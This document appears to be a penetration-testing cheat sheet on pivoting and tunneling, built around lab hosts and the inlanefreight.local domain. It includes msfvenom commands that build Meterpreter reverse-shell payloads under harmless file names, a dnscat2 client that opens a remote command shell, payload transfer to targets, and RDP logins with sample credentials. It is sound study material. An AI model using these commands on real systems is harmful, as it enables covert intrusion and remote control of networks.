Command Description
ifconfig Linux command that displays all current network configurations of a system.
ipconfig Windows command that displays all system network configurations.
netstat -r Displays the routing table for all IPv4-based protocols.
nmap -sT -p22,3306 <IPaddressofTarget> Scans a target for open SSH (22) or MySQL (3306) ports using a TCP connect scan.
ssh -L 1234:localhost:3306 ubuntu@<IPaddressofTarget> Creates an SSH tunnel forwarding local port 1234 to the remote’s port 3306 over SSH.
netstat -antp \| grep 1234 Shows all TCP connections (-antp) and filters for those on port 1234.
nmap -v -sV -p1234 localhost Scans localhost port 1234 with service/version detection and verbose output.
ssh -L 1234:localhost:3306 -L 8080:localhost:80 ubuntu@<IPaddressofTarget> Forwards local ports 1234→remote 3306 and 8080→remote 80 in one SSH session.
ssh -D 9050 ubuntu@<IPaddressofTarget> Opens a dynamic (SOCKS) proxy on local port 9050 over SSH.
tail -4 /etc/proxychains.conf Shows the last 4 lines of your Proxychains configuration to verify SOCKS entries.
proxychains nmap -v -sn 172.16.5.1-200 Runs an Nmap ping scan (-sn) through your SOCKS proxy for hosts 172.16.5.1‑200 with verbose output.
proxychains nmap -v -Pn -sT 172.16.5.19 Runs an Nmap TCP connect scan (-sT) through SOCKS on 172.16.5.19, skipping host discovery (-Pn).
proxychains msfconsole Launches Metasploit with all traffic routed through your SOCKS proxy.
msf6 > search rdp_scanner Searches Metasploit for a module named rdp_scanner.
proxychains xfreerdp /v:<IPaddressofTarget> /u:victor /p:pass@123 Connects via RDP through your SOCKS proxy using FreeRDP with the given credentials.
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<InternalIPofPivotHost> LPORT=8080 -f exe -o backupscript.exe Generates a Windows x64 Meterpreter reverse HTTPS payload calling back to LHOST on port 8080, output as backupscript.exe.
msf6 > use exploit/multi/handler Selects the multi/handler exploit in Metasploit (for catching your payload).
scp backupscript.exe ubuntu@<IPaddressofTarget>:~/ Copies backupscript.exe to the Ubuntu user’s home directory on the target.
python3 -m http.server 8123 Serves the current directory over HTTP on port 8123 (useful for file transfers).
Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe" PowerShell downloads backupscript.exe from your HTTP server and saves it locally.
ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:80 ubuntu@<IPaddressofTarget> -vN Sets up a reverse SSH tunnel so remote port 8080 forwards to the target’s port 80.
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IPaddressofAttackHost> LPORT=8080 -f elf -o backupjob Builds a Linux x64 Meterpreter reverse TCP payload calling back on port 8080, output as backupjob.
msf6 > run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23 Executes a Metasploit ping‑sweep against the 172.16.5.0/23 subnet.
for i in {1..254}; do ping -c 1 172.16.5.$i \| grep "bytes from" & done Bash loop to ping every host in 172.16.5.1–254 and background successful replies.
for /L %i in (1,1,254) do ping 172.16.5.%i -n 1 -w 100 \| find "Reply" Batch loop on Windows to ping 172.16.5.1–254 once each with a 100 ms timeout.
1..254 \| %{"172.16.5.$($_): $(Test-Connection -Count 1 -ComputerName 172.16.5.$($_) -Quiet)"} PowerShell one‑liner to test connectivity for every host .1–.254 and print results.
msf6 > use auxiliary/server/socks_proxy Selects Metasploit’s SOCKS proxy server module.
msf6 auxiliary(server/socks_proxy) > jobs Lists currently running Metasploit jobs (e.g. your SOCKS server).
Add to /etc/proxychains.conf:
socks4 127.0.0.1 9050		 Enables a SOCKS4 proxy at 127.0.0.1:9050 in Proxychains.
Add to /etc/proxychains.conf:
socks5 127.0.0.1 1080		 Enables a SOCKS5 proxy at 127.0.0.1:1080 in Proxychains.
msf6 > use post/multi/manage/autoroute Loads Metasploit’s autoroute module (for pivot routing).
meterpreter > help portfwd Shows usage for Meterpreter’s portfwd command.
meterpreter > portfwd add -l 3300 -p 3389 -r <IPaddressofTarget> Forwards local port 3300 to the target’s RDP port 3389 within your Meterpreter session.
xfreerdp /v:localhost:3300 /u:victor /p:pass@123 RDP into localhost:3300 (must have a forward in place) with specified credentials.
netstat -antp Lists all TCP connections (-a), shows PIDs (-p), in numeric form (-n), and only TCP (-t).
meterpreter > portfwd add -R -l 8081 -p 1234 -L <IPaddressofAttackHost> Sets up a reverse port forward from the target back to your attack host on port 8081 → port 1234.
meterpreter > bg Backgrounds the current Meterpreter session.
socat TCP4-LISTEN:8080,fork TCP4:<IPaddressofAttackHost>:80 Listens on local port 8080, forks on each connection, then proxies to your attack host on port 80.
socat TCP4-LISTEN:8080,fork TCP4:<IPaddressofTarget>:8443 Same as above, but proxies to the target’s port 8443.
plink -D 9050 ubuntu@<IPaddressofTarget> PuTTY’s Plink for dynamic SOCKS5 forwarding on Windows (local port 9050).
sudo apt-get install sshuttle Installs sshuttle (VPN‑like transparent proxy over SSH).
sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/24 -v Routes all 172.16.5.0/24 traffic through the SSH server at 10.129.202.64 with verbose logging.
sudo git clone https://github.com/klsecservices/rpivot.git Clones the rpivot repository.
sudo apt-get install python2.7 Installs Python 2.7.
python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0 Launches the rpivot server on SOCKS port 9050, HTTP port 9999, listening on all interfaces.
scp -r rpivot ubuntu@<IPaddressofTarget>:~ Recursively copies the rpivot directory to the target’s home folder.
python2.7 client.py --server-ip 10.10.14.18 --server-port 9999 Runs the rpivot client, connecting to your rpivot server.
proxychains firefox-esr <IPaddressofTargetWebServer>:80 Launches Firefox ESR with all traffic through your SOCKS proxy.
python client.py --server-ip <IPaddressofTargetWebServer> --server-port 8080 --ntlm-proxy-ip <IPaddressofProxy> --ntlm-proxy-port 8081 --domain <WindowsDomain> --username <username> --password <password> Runs rpivot client against an NTLM‑authenticating HTTP proxy.
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.42.198 connectport=3389 connectaddress=172.16.5.25 Windows netsh rule to forward local port 8080 to 172.16.5.25:3389.
netsh interface portproxy show v4tov4 Displays the configuration for the v4tov4 portproxy rule.
git clone https://github.com/iagox86/dnscat2.git Clones the dnscat2 DNS‑tunneling tool.
sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache Starts the dnscat2 server on port 53 for the inlanefreight.local domain without DNS caching.
git clone https://github.com/lukebaggett/dnscat2-powershell.git Clones the PowerShell client for dnscat2.
Import-Module dnscat2.ps1 Loads the dnscat2 PowerShell module.
Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd Connects the PowerShell client back to your dnscat2 server and opens a command shell.
dnscat2> ? Lists available dnscat2 commands.
dnscat2> window -i 1 Interacts with dnscat2 session window 1.
./chisel server -v -p 1234 --socks5 Starts a Chisel server in verbose mode on port 1234 with SOCKS5 support.
./chisel client -v 10.129.202.64:1234 socks Connects a Chisel client to your server at 10.129.202.64:1234 over SOCKS.
git clone https://github.com/utoni/ptunnel-ng.git Clones the ptunnel‑ng repository.
sudo ./autogen.sh Builds ptunnel‑ng from source.
sudo ./ptunnel-ng -r 10.129.202.64 -R 22 Runs the ptunnel‑ng server on remote host port 22.
sudo ./ptunnel-ng -p 10.129.202.64 -l 2222 -r 10.129.202.64 -R 22 Connects to ptunnel‑ng on local port 2222, forwarding to remote port 22.
ssh -p 2222 -l ubuntu 127.0.0.1 SSH into localhost:2222 (e.g. through an ICMP or ptunnel tunnel).
regsvr32 SocksOverRDP-Plugin.dll Registers the SocksOverRDP plugin on Windows.
netstat -antb \| findstr 1080 Lists all TCP connections with PIDs and filters for those listening on port 1080.